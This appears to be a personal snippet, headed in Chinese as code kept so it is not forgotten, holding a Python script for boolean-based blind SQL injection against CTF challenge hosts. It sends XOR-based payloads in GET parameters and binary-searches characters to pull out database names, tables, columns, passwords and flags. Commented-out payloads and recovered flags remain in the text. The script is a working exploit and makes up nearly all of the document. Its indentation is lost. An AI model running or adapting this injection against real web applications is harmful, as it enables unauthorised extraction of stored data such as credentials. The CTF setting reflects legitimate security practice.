贴个代码,防止忘记
GET型:
import requests
import time
flag=''
#key="ERR"
#url="http://bf06151e-232d-4024-8223-6d6171dfd75a.node4.buuoj.cn/search.php?"
key="student number not exists"
url="http://6a0bfa86-f4c3-45e5-907e-ba518a2fbf6d.node4.buuoj.cn:81?"
for i in range(1,60):
l=33
r=127
while(l<r):
mid=(l+r)>>1
#data="id=1^(ascii(substr(database(),%d,1))>%d)"%(i,mid)
#data="id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1))>%d)" % (i,mid)
#F1naI1y, Flaaaaag
#data = "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)" % (i, mid)
#id,fl4gawsl//id,username,password
#data = "id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, mid)
#flag{5ca4b86b-8846-40c7-b9a1-1ea844b31fa9}
data="stunum=1^(ascii(substr((select(group_concat(value))from(flag)),%d,1))>%d)" % (i, mid)
#flag{dddc2daa-a7a6-aed-b44d-b71197d3f46}
res=requests.get(url+data)
time.sleep(1)
if key in res.text:
l=mid+1
else:
r=mid
if(mid==127 or mid==33):
break
flag=flag+chr(r)
print(flag)
print(flag)